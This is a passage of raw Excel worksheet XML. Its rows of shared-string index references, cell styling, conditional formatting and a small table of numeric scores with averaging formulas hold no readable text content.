      <c r="H88" t="s">
        <v>1132</v>
      </c>
    </row>
    <row r="89" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A89" t="s">
        <v>1133</v>
      </c>
      <c r="G89" t="s">
        <v>949</v>
      </c>
      <c r="H89" t="s">
        <v>1134</v>
      </c>
    </row>
    <row r="90" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A90" t="s">
        <v>1135</v>
      </c>
      <c r="B90" t="s">
        <v>1136</v>
      </c>
      <c r="E90" t="s">
        <v>1109</v>
      </c>
      <c r="F90" t="s">
        <v>1137</v>
      </c>
      <c r="G90" t="s">
        <v>947</v>
      </c>
      <c r="H90" t="s">
        <v>1138</v>
      </c>
    </row>
    <row r="91" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A91" t="s">
        <v>1139</v>
      </c>
      <c r="C91" s="2" t="s">
        <v>14</v>
      </c>
      <c r="G91" t="s">
        <v>949</v>
      </c>
      <c r="H91" t="s">
        <v>1140</v>
      </c>
    </row>
    <row r="92" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A92" t="s">
        <v>23</v>
      </c>
      <c r="C92" s="2" t="s">
        <v>14</v>
      </c>
      <c r="G92" t="s">
        <v>949</v>
      </c>
      <c r="H92" t="s">
        <v>1141</v>
      </c>
    </row>
    <row r="93" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A93" t="s">
        <v>716</v>
      </c>
      <c r="C93" s="2" t="s">
        <v>14</v>
      </c>
      <c r="G93" t="s">
        <v>949</v>
      </c>
      <c r="H93" t="s">
        <v>1142</v>
      </c>
    </row>
    <row r="94" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A94" t="s">
        <v>1143</v>
      </c>
      <c r="B94" t="s">
        <v>1144</v>
      </c>
      <c r="E94" t="s">
        <v>965</v>
      </c>
      <c r="F94" t="s">
        <v>760</v>
      </c>
      <c r="G94" t="s">
        <v>947</v>
      </c>
      <c r="H94" t="s">
        <v>1145</v>
      </c>
    </row>
    <row r="95" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A95" t="s">
        <v>1146</v>
      </c>
      <c r="G95" t="s">
        <v>949</v>
      </c>
      <c r="H95" t="s">
        <v>1147</v>
      </c>
    </row>
    <row r="96" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A96" t="s">
        <v>1148</v>
      </c>
      <c r="B96" t="s">
        <v>1149</v>
      </c>
      <c r="E96" t="s">
        <v>999</v>
      </c>
      <c r="F96" t="s">
        <v>161</v>
      </c>
      <c r="G96" t="s">
        <v>947</v>
      </c>
      <c r="H96" t="s">
        <v>1150</v>
      </c>
    </row>
    <row r="97" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A97" t="s">
        <v>1151</v>
      </c>
      <c r="G97" t="s">
        <v>949</v>
      </c>
      <c r="H97" t="s">
        <v>1152</v>
      </c>
    </row>
    <row r="98" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A98" t="s">
        <v>1153</v>
      </c>
      <c r="G98" t="s">
        <v>949</v>
      </c>
      <c r="H98" t="s">
        <v>1154</v>
      </c>
    </row>
    <row r="99" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A99" t="s">
        <v>1155</v>
      </c>
      <c r="G99" t="s">
        <v>949</v>
      </c>
      <c r="H99" t="s">
        <v>1156</v>
      </c>
    </row>
    <row r="100" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A100" t="s">
        <v>1157</v>
      </c>
      <c r="B100" t="s">
        <v>1158</v>
      </c>
      <c r="E100" t="s">
        <v>1021</v>
      </c>
      <c r="F100" t="s">
        <v>1159</v>
      </c>
      <c r="G100" t="s">
        <v>947</v>
      </c>
      <c r="H100" t="s">
        <v>1160</v>
      </c>
    </row>
    <row r="101" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A101" t="s">
        <v>174</v>
      </c>
      <c r="G101" t="s">
        <v>949</v>
      </c>
      <c r="H101" t="s">
        <v>1161</v>
      </c>
    </row>
    <row r="102" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A102" t="s">
        <v>652</v>
      </c>
      <c r="G102" t="s">
        <v>949</v>
      </c>
      <c r="H102" t="s">
        <v>1162</v>
      </c>
    </row>
    <row r="103" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A103" t="s">
        <v>691</v>
      </c>
      <c r="G103" t="s">
        <v>949</v>
      </c>
      <c r="H103" t="s">
        <v>1163</v>
      </c>
    </row>
    <row r="104" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A104" t="s">
        <v>1164</v>
      </c>
      <c r="G104" t="s">
        <v>949</v>
      </c>
      <c r="H104" t="s">
        <v>1165</v>
      </c>
    </row>
    <row r="105" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A105" t="s">
        <v>1166</v>
      </c>
      <c r="G105" t="s">
        <v>949</v>
      </c>
      <c r="H105" t="s">
        <v>1167</v>
      </c>
    </row>
    <row r="106" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A106" t="s">
        <v>1168</v>
      </c>
      <c r="G106" t="s">
        <v>949</v>
      </c>
      <c r="H106" t="s">
        <v>1169</v>
      </c>
    </row>
    <row r="107" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A107" t="s">
        <v>1170</v>
      </c>
      <c r="B107" t="s">
        <v>1171</v>
      </c>
      <c r="E107" t="s">
        <v>995</v>
      </c>
      <c r="F107" t="s">
        <v>111</v>
      </c>
      <c r="G107" t="s">
        <v>947</v>
      </c>
      <c r="H107" t="s">
        <v>1172</v>
      </c>
    </row>
    <row r="108" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A108" t="s">
        <v>1173</v>
      </c>
      <c r="G108" t="s">
        <v>949</v>
      </c>
      <c r="H108" t="s">
        <v>1174</v>
      </c>
    </row>
    <row r="109" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A109" t="s">
        <v>1175</v>
      </c>
      <c r="G109" t="s">
        <v>949</v>
      </c>
      <c r="H109" t="s">
        <v>1176</v>
      </c>
    </row>
    <row r="110" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A110" t="s">
        <v>1177</v>
      </c>
      <c r="G110" t="s">
        <v>949</v>
      </c>
      <c r="H110" t="s">
        <v>1178</v>
      </c>
    </row>
    <row r="111" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A111" t="s">
        <v>1179</v>
      </c>
      <c r="B111" t="s">
        <v>1180</v>
      </c>
      <c r="E111" t="s">
        <v>1021</v>
      </c>
      <c r="F111" t="s">
        <v>31</v>
      </c>
      <c r="G111" t="s">
        <v>947</v>
      </c>
      <c r="H111" t="s">
        <v>1181</v>
      </c>
    </row>
    <row r="112" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A112" t="s">
        <v>1182</v>
      </c>
      <c r="G112" t="s">
        <v>949</v>
      </c>
      <c r="H112" t="s">
        <v>1183</v>
      </c>
    </row>
    <row r="113" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A113" t="s">
        <v>1184</v>
      </c>
      <c r="B113" t="s">
        <v>1185</v>
      </c>
      <c r="E113" t="s">
        <v>1021</v>
      </c>
      <c r="F113" t="s">
        <v>1159</v>
      </c>
      <c r="G113" t="s">
        <v>947</v>
      </c>
      <c r="H113" t="s">
        <v>1186</v>
      </c>
    </row>
    <row r="114" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A114" t="s">
        <v>370</v>
      </c>
      <c r="G114" t="s">
        <v>949</v>
      </c>
      <c r="H114" t="s">
        <v>1187</v>
      </c>
    </row>
    <row r="115" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A115" t="s">
        <v>1188</v>
      </c>
      <c r="B115" t="s">
        <v>1189</v>
      </c>
      <c r="E115" t="s">
        <v>1021</v>
      </c>
      <c r="F115" t="s">
        <v>24</v>
      </c>
      <c r="G115" t="s">
        <v>947</v>
      </c>
      <c r="H115" t="s">
        <v>1190</v>
      </c>
    </row>
    <row r="116" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A116" t="s">
        <v>1191</v>
      </c>
      <c r="G116" t="s">
        <v>949</v>
      </c>
      <c r="H116" t="s">
        <v>1192</v>
      </c>
    </row>
    <row r="117" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A117" t="s">
        <v>1193</v>
      </c>
      <c r="G117" t="s">
        <v>949</v>
      </c>
      <c r="H117" t="s">
        <v>1194</v>
      </c>
    </row>
    <row r="118" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A118" t="s">
        <v>1195</v>
      </c>
      <c r="G118" t="s">
        <v>949</v>
      </c>
      <c r="H118" t="s">
        <v>1196</v>
      </c>
    </row>
    <row r="119" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A119" t="s">
        <v>1197</v>
      </c>
      <c r="B119" t="s">
        <v>1198</v>
      </c>
      <c r="E119" t="s">
        <v>971</v>
      </c>
      <c r="F119" t="s">
        <v>81</v>
      </c>
      <c r="G119" t="s">
        <v>947</v>
      </c>
      <c r="H119" t="s">
        <v>1199</v>
      </c>
    </row>
    <row r="120" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A120" t="s">
        <v>1200</v>
      </c>
      <c r="G120" t="s">
        <v>949</v>
      </c>
      <c r="H120" t="s">
        <v>1201</v>
      </c>
    </row>
    <row r="121" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A121" t="s">
        <v>1202</v>
      </c>
      <c r="G121" t="s">
        <v>949</v>
      </c>
      <c r="H121" t="s">
        <v>1203</v>
      </c>
    </row>
    <row r="122" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A122" t="s">
        <v>1204</v>
      </c>
      <c r="G122" t="s">
        <v>949</v>
      </c>
      <c r="H122" t="s">
        <v>1205</v>
      </c>
    </row>
    <row r="123" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A123" t="s">
        <v>1206</v>
      </c>
      <c r="G123" t="s">
        <v>949</v>
      </c>
      <c r="H123" t="s">
        <v>1207</v>
      </c>
    </row>
    <row r="124" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A124" t="s">
        <v>1208</v>
      </c>
      <c r="G124" t="s">
        <v>949</v>
      </c>
      <c r="H124" t="s">
        <v>1209</v>
      </c>
    </row>
    <row r="125" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A125" t="s">
        <v>1210</v>
      </c>
      <c r="B125" t="s">
        <v>1211</v>
      </c>
      <c r="E125" t="s">
        <v>1212</v>
      </c>
      <c r="F125" t="s">
        <v>123</v>
      </c>
      <c r="G125" t="s">
        <v>947</v>
      </c>
      <c r="H125" t="s">
        <v>1213</v>
      </c>
    </row>
    <row r="126" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A126" t="s">
        <v>595</v>
      </c>
      <c r="G126" t="s">
        <v>949</v>
      </c>
      <c r="H126" t="s">
        <v>1214</v>
      </c>
    </row>
    <row r="127" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A127" t="s">
        <v>122</v>
      </c>
      <c r="G127" t="s">
        <v>949</v>
      </c>
      <c r="H127" t="s">
        <v>1215</v>
      </c>
    </row>
    <row r="128" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A128" t="s">
        <v>1216</v>
      </c>
      <c r="G128" t="s">
        <v>949</v>
      </c>
      <c r="H128" t="s">
        <v>1217</v>
      </c>
    </row>
    <row r="129" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A129" t="s">
        <v>1218</v>
      </c>
      <c r="G129" t="s">
        <v>949</v>
      </c>
      <c r="H129" t="s">
        <v>1219</v>
      </c>
    </row>
    <row r="130" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A130" t="s">
        <v>272</v>
      </c>
      <c r="G130" t="s">
        <v>949</v>
      </c>
      <c r="H130" t="s">
        <v>1220</v>
      </c>
    </row>
    <row r="131" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A131" t="s">
        <v>1221</v>
      </c>
      <c r="B131" t="s">
        <v>1222</v>
      </c>
      <c r="E131" t="s">
        <v>946</v>
      </c>
      <c r="F131" t="s">
        <v>69</v>
      </c>
      <c r="G131" t="s">
        <v>947</v>
      </c>
      <c r="H131" t="s">
        <v>1223</v>
      </c>
    </row>
    <row r="132" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A132" t="s">
        <v>1224</v>
      </c>
      <c r="G132" t="s">
        <v>949</v>
      </c>
      <c r="H132" t="s">
        <v>1225</v>
      </c>
    </row>
    <row r="133" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A133" t="s">
        <v>1226</v>
      </c>
      <c r="G133" t="s">
        <v>949</v>
      </c>
      <c r="H133" t="s">
        <v>1227</v>
      </c>
    </row>
    <row r="134" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A134" t="s">
        <v>1228</v>
      </c>
      <c r="G134" t="s">
        <v>949</v>
      </c>
      <c r="H134" t="s">
        <v>1229</v>
      </c>
    </row>
    <row r="135" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A135" t="s">
        <v>1230</v>
      </c>
      <c r="G135" t="s">
        <v>949</v>
      </c>
      <c r="H135" t="s">
        <v>1231</v>
      </c>
    </row>
    <row r="136" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A136" t="s">
        <v>1232</v>
      </c>
      <c r="G136" t="s">
        <v>949</v>
      </c>
      <c r="H136" t="s">
        <v>1233</v>
      </c>
    </row>
    <row r="137" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A137" t="s">
        <v>1234</v>
      </c>
      <c r="B137" t="s">
        <v>1235</v>
      </c>
      <c r="E137" t="s">
        <v>1021</v>
      </c>
      <c r="F137" t="s">
        <v>31</v>
      </c>
      <c r="G137" t="s">
        <v>947</v>
      </c>
      <c r="H137" t="s">
        <v>1236</v>
      </c>
    </row>
    <row r="138" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A138" t="s">
        <v>1237</v>
      </c>
      <c r="G138" t="s">
        <v>949</v>
      </c>
      <c r="H138" t="s">
        <v>1238</v>
      </c>
    </row>
    <row r="139" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A139" t="s">
        <v>1239</v>
      </c>
      <c r="B139" t="s">
        <v>1240</v>
      </c>
      <c r="E139" t="s">
        <v>946</v>
      </c>
      <c r="F139" t="s">
        <v>701</v>
      </c>
      <c r="G139" t="s">
        <v>947</v>
      </c>
      <c r="H139" t="s">
        <v>1241</v>
      </c>
    </row>
    <row r="140" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A140" t="s">
        <v>1242</v>
      </c>
      <c r="G140" t="s">
        <v>949</v>
      </c>
      <c r="H140" t="s">
        <v>1243</v>
      </c>
    </row>
    <row r="141" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A141" t="s">
        <v>584</v>
      </c>
      <c r="G141" t="s">
        <v>949</v>
      </c>
      <c r="H141" t="s">
        <v>1244</v>
      </c>
    </row>
    <row r="142" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A142" t="s">
        <v>1245</v>
      </c>
      <c r="B142" t="s">
        <v>1246</v>
      </c>
      <c r="E142" t="s">
        <v>1021</v>
      </c>
      <c r="F142" t="s">
        <v>31</v>
      </c>
      <c r="G142" t="s">
        <v>947</v>
      </c>
      <c r="H142" t="s">
        <v>1247</v>
      </c>
    </row>
    <row r="143" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A143" t="s">
        <v>1248</v>
      </c>
      <c r="G143" t="s">
        <v>949</v>
      </c>
      <c r="H143" t="s">
        <v>1249</v>
      </c>
    </row>
    <row r="144" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A144" t="s">
        <v>1250</v>
      </c>
      <c r="G144" t="s">
        <v>949</v>
      </c>
      <c r="H144" t="s">
        <v>1251</v>
      </c>
    </row>
    <row r="145" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A145" t="s">
        <v>1252</v>
      </c>
      <c r="G145" t="s">
        <v>949</v>
      </c>
      <c r="H145" t="s">
        <v>1253</v>
      </c>
    </row>
    <row r="146" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A146" t="s">
        <v>1254</v>
      </c>
      <c r="G146" t="s">
        <v>949</v>
      </c>
      <c r="H146" t="s">
        <v>1255</v>
      </c>
    </row>
  </sheetData>
  <conditionalFormatting sqref="A2:C202">
    <cfRule type="expression" dxfId="0" priority="1" stopIfTrue="1">
      <formula>IF($C2="yes",1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <dataValidations count="1">
    <dataValidation type="custom" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="C2:C1048576" xr:uid="{E720379C-3CA5-48AD-9ABA-80F1456070DD}">
      <formula1>IF(C2="yes",1,0)</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05FA3-1BB1-4B25-A976-3C9B0E5D2600}">
  <dimension ref="A1:E42"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="C94" sqref="C94"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="1" width="8.85546875" customWidth="1"/>
    <col min="2" max="2" width="95.140625" bestFit="1" customWidth="1"/>
    <col min="3" max="4" width="98.7109375" customWidth="1"/>
    <col min="5" max="5" width="84.85546875" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1" s="16" t="s">
        <v>1256</v>
      </c>
      <c r="B1" s="27" t="s">
        <v>1257</v>
      </c>
      <c r="C1" t="s">
        <v>1258</v>
      </c>
    </row>
    <row r="3" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3" s="16" t="s">
        <v>1259</v>
      </c>
      <c r="B3" s="16"/>
      <c r="C3" s="16"/>
    </row>
    <row r="4" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4" s="19" t="s">
        <v>1260</v>
      </c>
      <c r="B4" s="19" t="s">
        <v>1261</v>
      </c>
      <c r="C4" s="19" t="s">
        <v>1262</v>
      </c>
    </row>
    <row r="5" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5" s="17"/>
      <c r="B5" t="s">
        <v>1263</v>
      </c>
      <c r="C5" t="s">
        <v>1264</v>
      </c>
    </row>
    <row r="6" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6" s="18"/>
      <c r="B6" t="s">
        <v>1265</v>
      </c>
      <c r="C6" t="s">
        <v>1264</v>
      </c>
    </row>
    <row r="7" spans="1:5" x14ac:dyDescent="0.25">
      <c r="B7" t="s">
        <v>1266</v>
      </c>
      <c r="C7" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="9" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A9" s="16" t="s">
        <v>1267</v>
      </c>
      <c r="B9" s="16"/>
      <c r="C9" s="16"/>
      <c r="D9" s="16"/>
      <c r="E9" s="16"/>
    </row>
    <row r="10" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A10" s="19" t="s">
        <v>1260</v>
      </c>
      <c r="B10" s="19" t="s">
        <v>1261</v>
      </c>
      <c r="C10" s="19" t="s">
        <v>1268</v>
      </c>
    </row>
    <row r="11" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A11" s="7"/>
      <c r="B11" t="s">
        <v>1269</v>
      </c>
      <c r="C11" t="s">
        <v>1270</v>
      </c>
    </row>
    <row r="12" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A12" s="8"/>
      <c r="B12" t="s">
        <v>1271</v>
      </c>
      <c r="C12" t="s">
        <v>1272</v>
      </c>
    </row>
    <row r="13" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A13" s="9"/>
      <c r="B13" t="s">
        <v>1273</v>
      </c>
      <c r="C13" t="s">
        <v>1274</v>
      </c>
    </row>
    <row r="14" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A14" s="13"/>
      <c r="B14" t="s">
        <v>1275</v>
      </c>
      <c r="C14" t="s">
        <v>1276</v>
      </c>
    </row>
    <row r="15" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A15" s="14"/>
      <c r="B15" t="s">
        <v>1277</v>
      </c>
      <c r="C15" t="s">
        <v>1278</v>
      </c>
    </row>
    <row r="16" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A16" s="11"/>
      <c r="B16" t="s">
        <v>1279</v>
      </c>
      <c r="C16" t="s">
        <v>1280</v>
      </c>
    </row>
    <row r="17" spans="1:4" x14ac:dyDescent="0.25">
      <c r="A17" s="23" t="s">
        <v>1281</v>
      </c>
      <c r="B17" t="s">
        <v>1282</v>
      </c>
      <c r="C17" t="s">
        <v>1283</v>
      </c>
    </row>
    <row r="18" spans="1:4" x14ac:dyDescent="0.25">
      <c r="A18" s="10"/>
      <c r="B18" t="s">
        <v>1284</v>
      </c>
      <c r="C18" t="s">
        <v>1285</v>
      </c>
    </row>
    <row r="19" spans="1:4" x14ac:dyDescent="0.25">
      <c r="A19" t="s">
        <v>1286</v>
      </c>
      <c r="B19" t="s">
        <v>1287</v>
      </c>
      <c r="C19" t="s">
        <v>1288</v>
      </c>
    </row>
    <row r="20" spans="1:4" x14ac:dyDescent="0.25">
      <c r="A20" t="s">
        <v>1286</v>
      </c>
      <c r="B20" t="s">
        <v>1289</v>
      </c>
      <c r="C20" t="s">
        <v>1290</v>
      </c>
    </row>
    <row r="22" spans="1:4" x14ac:dyDescent="0.25">
      <c r="A22" s="16" t="s">
        <v>1291</v>
      </c>
      <c r="B22" s="16"/>
      <c r="C22" s="16"/>
      <c r="D22" s="16"/>
    </row>
    <row r="23" spans="1:4" x14ac:dyDescent="0.25">
      <c r="A23" s="19" t="s">
        <v>1260</v>
      </c>
      <c r="B23" s="19" t="s">
        <v>1261</v>
      </c>
      <c r="C23" s="19" t="s">
        <v>1268</v>
      </c>
    </row>
    <row r="24" spans="1:4" x14ac:dyDescent="0.25">
      <c r="A24" s="15"/>
      <c r="B24" t="s">
        <v>1292</v>
      </c>
      <c r="C24" t="s">
        <v>1293</v>
      </c>
    </row>
    <row r="25" spans="1:4" x14ac:dyDescent="0.25">
      <c r="A25" s="10"/>
      <c r="B25" t="s">
        <v>1294</v>
      </c>
      <c r="C25" t="s">
        <v>1295</v>
      </c>
    </row>
    <row r="26" spans="1:4" x14ac:dyDescent="0.25">
      <c r="A26" s="12"/>
      <c r="B26" t="s">
        <v>1296</v>
      </c>
      <c r="C26" t="s">
        <v>1297</v>
      </c>
    </row>
    <row r="27" spans="1:4" x14ac:dyDescent="0.25">
      <c r="A27" s="11"/>
      <c r="B27" t="s">
        <v>1298</v>
      </c>
      <c r="C27" t="s">
        <v>1299</v>
      </c>
    </row>
    <row r="28" spans="1:4" x14ac:dyDescent="0.25">
      <c r="A28" t="s">
        <v>1286</v>
      </c>
      <c r="B28" t="s">
        <v>1300</v>
      </c>
      <c r="C28" t="s">
        <v>1301</v>
      </c>
    </row>
    <row r="30" spans="1:4" x14ac:dyDescent="0.25">
      <c r="A30" s="16" t="s">
        <v>1302</v>
      </c>
      <c r="B30" s="16"/>
      <c r="C30" s="16"/>
    </row>
    <row r="31" spans="1:4" x14ac:dyDescent="0.25">
      <c r="A31" s="19" t="s">
        <v>1260</v>
      </c>
      <c r="B31" s="19" t="s">
        <v>1261</v>
      </c>
      <c r="C31" s="19" t="s">
        <v>1268</v>
      </c>
    </row>
    <row r="32" spans="1:4" x14ac:dyDescent="0.25">
      <c r="A32" s="14"/>
      <c r="B32" t="s">
        <v>1303</v>
      </c>
      <c r="C32" t="s">
        <v>1304</v>
      </c>
    </row>
    <row r="34" spans="1:4" x14ac:dyDescent="0.25">
      <c r="A34" s="16" t="s">
        <v>1305</v>
      </c>
      <c r="B34" s="16"/>
      <c r="C34" s="34" t="s">
        <v>1306</v>
      </c>
      <c r="D34" s="34"/>
    </row>
    <row r="35" spans="1:4" x14ac:dyDescent="0.25">
      <c r="B35" t="s">
        <v>1307</v>
      </c>
      <c r="C35" t="s">
        <v>1308</v>
      </c>
      <c r="D35" t="s">
        <v>1309</v>
      </c>
    </row>
    <row r="36" spans="1:4" x14ac:dyDescent="0.25">
      <c r="B36" t="s">
        <v>1310</v>
      </c>
      <c r="C36" t="s">
        <v>1311</v>
      </c>
      <c r="D36" t="s">
        <v>1312</v>
      </c>
    </row>
    <row r="37" spans="1:4" x14ac:dyDescent="0.25">
      <c r="B37" t="s">
        <v>1313</v>
      </c>
      <c r="C37" t="s">
        <v>1314</v>
      </c>
      <c r="D37" t="s">
        <v>1315</v>
      </c>
    </row>
    <row r="38" spans="1:4" x14ac:dyDescent="0.25">
      <c r="B38" t="s">
        <v>1316</v>
      </c>
      <c r="C38" t="s">
        <v>1317</v>
      </c>
      <c r="D38" t="s">
        <v>1318</v>
      </c>
    </row>
    <row r="40" spans="1:4" x14ac:dyDescent="0.25">
      <c r="A40" t="s">
        <v>1319</v>
      </c>
    </row>
    <row r="41" spans="1:4" x14ac:dyDescent="0.25">
      <c r="B41" t="s">
        <v>1320</v>
      </c>
      <c r="C41" t="s">
        <v>1321</v>
      </c>
    </row>
    <row r="42" spans="1:4" x14ac:dyDescent="0.25">
      <c r="B42" t="s">
        <v>1322</v>
      </c>
      <c r="C42" t="s">
        <v>1323</v>
      </c>
    </row>
  </sheetData>
  <mergeCells count="1">
    <mergeCell ref="C34:D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2EC44-547E-472F-A35C-65401054B9C0}">
  <dimension ref="A1:Q28"/>
  <sheetViews>
    <sheetView topLeftCell="B1" workbookViewId="0">
      <selection activeCell="C94" sqref="C94"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="1" width="10.140625" customWidth="1"/>
    <col min="2" max="2" width="15.140625" bestFit="1" customWidth="1"/>
    <col min="3" max="3" width="21.85546875" bestFit="1" customWidth="1"/>
    <col min="4" max="4" width="12.28515625" bestFit="1" customWidth="1"/>
    <col min="5" max="6" width="12.5703125" bestFit="1" customWidth="1"/>
    <col min="7" max="7" width="18.140625" bestFit="1" customWidth="1"/>
    <col min="8" max="8" width="15.5703125" bestFit="1" customWidth="1"/>
    <col min="9" max="9" width="16.5703125" bestFit="1" customWidth="1"/>
    <col min="10" max="10" width="9.5703125" bestFit="1" customWidth="1"/>
    <col min="11" max="11" width="17.5703125" bestFit="1" customWidth="1"/>
    <col min="12" max="12" width="12.5703125" bestFit="1" customWidth="1"/>
    <col min="13" max="13" width="21.140625" bestFit="1" customWidth="1"/>
    <col min="14" max="15" width="12.5703125" bestFit="1" customWidth="1"/>
    <col min="16" max="16" width="16" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:16" x14ac:dyDescent="0.25">
      <c r="A1" s="25" t="s">
        <v>1324</v>
      </c>
      <c r="B1" s="25" t="s">
        <v>0</v>
      </c>
      <c r="C1" s="25" t="s">
        <v>1</v>
      </c>
      <c r="D1" s="25" t="s">
        <v>2</v>
      </c>
      <c r="E1" s="25" t="s">
        <v>3</v>
      </c>
      <c r="F1" s="25" t="s">
        <v>4</v>
      </c>
      <c r="G1" s="25" t="s">
        <v>5</v>
      </c>
      <c r="H1" s="25" t="s">
        <v>6</v>
      </c>
      <c r="I1" s="25" t="s">
        <v>7</v>
      </c>
      <c r="J1" s="25" t="s">
        <v>8</v>
      </c>
      <c r="K1" s="25" t="s">
        <v>9</v>
      </c>
      <c r="L1" s="25" t="s">
        <v>10</v>
      </c>
      <c r="M1" s="25" t="s">
        <v>11</v>
      </c>
      <c r="N1" s="25" t="s">
        <v>12</v>
      </c>
      <c r="O1" s="25" t="s">
        <v>13</v>
      </c>
      <c r="P1" s="26" t="s">
        <v>19</v>
      </c>
    </row>
    <row r="2" spans="1:16" x14ac:dyDescent="0.25">
      <c r="A2" s="1" t="s">
        <v>1325</v>
      </c>
      <c r="B2" s="24">
        <v>0.1</v>
      </c>
      <c r="C2" s="24">
        <v>0.11</v>
      </c>
      <c r="D2" s="24">
        <v>0.6</v>
      </c>
      <c r="E2" s="24">
        <v>0.33</v>
      </c>
      <c r="F2" s="24">
        <v>0.31</v>
      </c>
      <c r="G2" s="24">
        <v>0.27</v>
      </c>
      <c r="H2" s="24">
        <v>0.14000000000000001</v>
      </c>
      <c r="I2" s="24">
        <v>0.18</v>
      </c>
      <c r="J2" s="24">
        <v>0.06</v>
      </c>
      <c r="K2" s="24">
        <v>0.38</v>
      </c>
      <c r="L2" s="24">
        <v>0.16</v>
      </c>
      <c r="M2" s="24">
        <v>0.18</v>
      </c>
      <c r="N2" s="24">
        <v>0.44</v>
      </c>
      <c r="O2" s="24">
        <v>0.21</v>
      </c>
      <c r="P2" s="24">
        <f>(SUM(B2:O2))/14</f>
        <v>0.24785714285714291</v>
      </c>
    </row>
    <row r="3" spans="1:16" x14ac:dyDescent="0.25">
      <c r="A3" s="1" t="s">
        <v>1326</v>
      </c>
      <c r="B3" s="24">
        <v>1</v>
      </c>
      <c r="C3" s="24">
        <v>0.90773809523809534</v>
      </c>
      <c r="D3" s="24">
        <v>0.6</v>
      </c>
      <c r="E3" s="24">
        <v>0.6785714285714286</v>
      </c>
      <c r="F3" s="24">
        <v>0.50148809523809523</v>
      </c>
      <c r="G3" s="24">
        <v>0.50724489795918404</v>
      </c>
      <c r="H3" s="24">
        <v>0.36673397661769758</v>
      </c>
      <c r="I3" s="24">
        <v>0.48298319327731098</v>
      </c>
      <c r="J3" s="24">
        <v>0.30208333333333337</v>
      </c>
      <c r="K3" s="24">
        <v>0.52500000000000002</v>
      </c>
      <c r="L3" s="24">
        <v>0.23529411764705882</v>
      </c>
      <c r="M3" s="24">
        <v>0.2745098039215686</v>
      </c>
      <c r="N3" s="24">
        <v>0.55555555555555558</v>
      </c>
      <c r="O3" s="24">
        <v>0.35714285714285715</v>
      </c>
      <c r="P3" s="24">
        <f>(SUM(B3:O3))/14</f>
        <v>0.5210246681787275</v>
      </c>
    </row>
    <row r="4" spans="1:16" x14ac:dyDescent="0.25">
